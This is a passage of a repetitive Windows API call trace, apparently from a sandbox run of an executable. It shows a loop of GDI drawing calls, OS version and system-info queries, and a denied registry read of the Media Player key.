wProcessorRevision=0x5e03)) [0017.857] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.857] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.857] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.857] BeginPath (hdc=0x0) returned 0 [0017.857] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.857] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.857] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.857] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.858] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.858] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7a040713 [0017.858] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7004027d [0017.858] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e26 [0017.858] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e27 [0017.858] CombineRgn (hrgnDst=0x1040e26, hrgnSrc1=0x7a040713, hrgnSrc2=0x7004027d, iMode=1) returned 1 [0017.858] CombineRgn (hrgnDst=0x1040e27, hrgnSrc1=0x7a040713, hrgnSrc2=0x7004027d, iMode=4) returned 2 [0017.858] CreateSolidBrush (color=0xff) returned 0x2100e25 [0017.858] CreateSolidBrush (color=0xff0000) returned 0x1100e28 [0017.858] DeleteObject (ho=0x1100e28) returned 1 [0017.858] DeleteObject (ho=0x7004027d) returned 1 [0017.858] DeleteObject (ho=0x7a040713) returned 1 [0017.858] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.858] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.858] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.858] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.858] BeginPath (hdc=0x0) returned 0 [0017.858] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.858] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.858] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.859] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.859] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7104027d [0017.859] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7b040713 [0017.859] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e29 [0017.859] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2a [0017.859] CombineRgn (hrgnDst=0x1040e29, hrgnSrc1=0x7104027d, hrgnSrc2=0x7b040713, iMode=1) returned 1 [0017.859] CombineRgn (hrgnDst=0x1040e2a, hrgnSrc1=0x7104027d, hrgnSrc2=0x7b040713, iMode=4) returned 2 [0017.859] CreateSolidBrush (color=0xff) returned 0x2100e28 [0017.859] CreateSolidBrush (color=0xff0000) returned 0x1100e2b [0017.859] DeleteObject (ho=0x1100e2b) returned 1 [0017.859] DeleteObject (ho=0x7b040713) returned 1 [0017.859] DeleteObject (ho=0x7104027d) returned 1 [0017.859] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.859] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.859] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.859] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.859] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.859] BeginPath (hdc=0x0) returned 0 [0017.859] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.859] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.859] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.859] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.859] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.859] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.859] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.860] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7c040713 [0017.860] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7204027d [0017.860] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2c [0017.860] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2d [0017.860] CombineRgn (hrgnDst=0x1040e2c, hrgnSrc1=0x7c040713, hrgnSrc2=0x7204027d, iMode=1) returned 1 [0017.860] CombineRgn (hrgnDst=0x1040e2d, hrgnSrc1=0x7c040713, hrgnSrc2=0x7204027d, iMode=4) returned 2 [0017.860] CreateSolidBrush (color=0xff) returned 0x2100e2b [0017.860] CreateSolidBrush (color=0xff0000) returned 0x1100e2e [0017.860] DeleteObject (ho=0x1100e2e) returned 1 [0017.860] DeleteObject (ho=0x7204027d) returned 1 [0017.860] DeleteObject (ho=0x7c040713) returned 1 [0017.860] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.860] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.860] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.860] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.860] BeginPath (hdc=0x0) returned 0 [0017.860] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.860] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.860] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.860] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.860] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.860] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.860] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.861] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7304027d [0017.861] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7d040713 [0017.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e2f [0017.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e30 [0017.861] CombineRgn (hrgnDst=0x1040e2f, hrgnSrc1=0x7304027d, hrgnSrc2=0x7d040713, iMode=1) returned 1 [0017.861] CombineRgn (hrgnDst=0x1040e30, hrgnSrc1=0x7304027d, hrgnSrc2=0x7d040713, iMode=4) returned 2 [0017.861] CreateSolidBrush (color=0xff) returned 0x2100e2e [0017.861] CreateSolidBrush (color=0xff0000) returned 0x1100e31 [0017.861] DeleteObject (ho=0x1100e31) returned 1 [0017.861] DeleteObject (ho=0x7d040713) returned 1 [0017.861] DeleteObject (ho=0x7304027d) returned 1 [0017.861] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.861] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.861] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.861] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.861] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.861] BeginPath (hdc=0x0) returned 0 [0017.861] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.861] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.861] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.861] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.861] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.861] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7e040713 [0017.861] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7404027d [0017.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e32 [0017.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e33 [0017.862] CombineRgn (hrgnDst=0x1040e32, hrgnSrc1=0x7e040713, hrgnSrc2=0x7404027d, iMode=1) returned 1 [0017.862] CombineRgn (hrgnDst=0x1040e33, hrgnSrc1=0x7e040713, hrgnSrc2=0x7404027d, iMode=4) returned 2 [0017.862] CreateSolidBrush (color=0xff) returned 0x2100e31 [0017.862] CreateSolidBrush (color=0xff0000) returned 0x1100e34 [0017.862] DeleteObject (ho=0x1100e34) returned 1 [0017.862] DeleteObject (ho=0x7404027d) returned 1 [0017.862] DeleteObject (ho=0x7e040713) returned 1 [0017.862] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.862] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.862] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.862] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.862] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.862] BeginPath (hdc=0x0) returned 0 [0017.862] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.862] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.862] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.862] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.862] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.862] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.862] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.862] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7504027d [0017.863] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7f040713 [0017.863] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e35 [0017.863] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e36 [0017.863] CombineRgn (hrgnDst=0x1040e35, hrgnSrc1=0x7504027d, hrgnSrc2=0x7f040713, iMode=1) returned 1 [0017.863] CombineRgn (hrgnDst=0x1040e36, hrgnSrc1=0x7504027d, hrgnSrc2=0x7f040713, iMode=4) returned 2 [0017.863] CreateSolidBrush (color=0xff) returned 0x2100e34 [0017.863] CreateSolidBrush (color=0xff0000) returned 0x1100e37 [0017.863] DeleteObject (ho=0x1100e37) returned 1 [0017.863] DeleteObject (ho=0x7f040713) returned 1 [0017.863] DeleteObject (ho=0x7504027d) returned 1 [0017.863] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.863] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.863] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.863] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.863] BeginPath (hdc=0x0) returned 0 [0017.863] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.863] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.863] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.863] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.863] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x80040713 [0017.863] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7604027d [0017.863] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e38 [0017.863] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e39 [0017.863] CombineRgn (hrgnDst=0x1040e38, hrgnSrc1=0x80040713, hrgnSrc2=0x7604027d, iMode=1) returned 1 [0017.863] CombineRgn (hrgnDst=0x1040e39, hrgnSrc1=0x80040713, hrgnSrc2=0x7604027d, iMode=4) returned 2 [0017.864] CreateSolidBrush (color=0xff) returned 0x2100e37 [0017.864] CreateSolidBrush (color=0xff0000) returned 0x1100e3a [0017.864] DeleteObject (ho=0x1100e3a) returned 1 [0017.864] DeleteObject (ho=0x7604027d) returned 1 [0017.864] DeleteObject (ho=0x80040713) returned 1 [0017.864] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.864] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.864] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.864] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.864] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.864] BeginPath (hdc=0x0) returned 0 [0017.864] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.864] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.864] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.864] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.864] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.864] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.864] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.864] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7704027d [0017.864] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x81040713 [0017.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3b [0017.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3c [0017.864] CombineRgn (hrgnDst=0x1040e3b, hrgnSrc1=0x7704027d, hrgnSrc2=0x81040713, iMode=1) returned 1 [0017.864] CombineRgn (hrgnDst=0x1040e3c, hrgnSrc1=0x7704027d, hrgnSrc2=0x81040713, iMode=4) returned 2 [0017.864] CreateSolidBrush (color=0xff) returned 0x2100e3a [0017.864] CreateSolidBrush (color=0xff0000) returned 0x1100e3d [0017.864] DeleteObject (ho=0x1100e3d) returned 1 [0017.864] DeleteObject (ho=0x81040713) returned 1 [0017.865] DeleteObject (ho=0x7704027d) returned 1 [0017.865] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.865] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.865] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.865] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.865] BeginPath (hdc=0x0) returned 0 [0017.865] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.865] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.865] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.865] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.865] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.865] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.865] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x82040713 [0017.865] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7804027d [0017.865] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3e [0017.865] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040e3f [0017.865] CombineRgn (hrgnDst=0x1040e3e, hrgnSrc1=0x82040713, hrgnSrc2=0x7804027d, iMode=1) returned 1 [0017.865] CombineRgn (hrgnDst=0x1040e3f, hrgnSrc1=0x82040713, hrgnSrc2=0x7804027d, iMode=4) returned 2 [0017.865] CreateSolidBrush (color=0xff) returned 0x2100e3d [0017.865] CreateSolidBrush (color=0xff0000) returned 0x1100e40 [0017.865] DeleteObject (ho=0x1100e40) returned 1 [0017.865] DeleteObject (ho=0x7804027d) returned 1 [0017.865] DeleteObject (ho=0x82040713) returned 1 [0017.865] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.865] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.866] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.866] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.866] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.866] BeginPath (hdc=0x0) returned 0 [0017.866] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.866] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.866] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.866] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.866] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.866] RegOpenKeyExW (in: hKey=0x80000002, 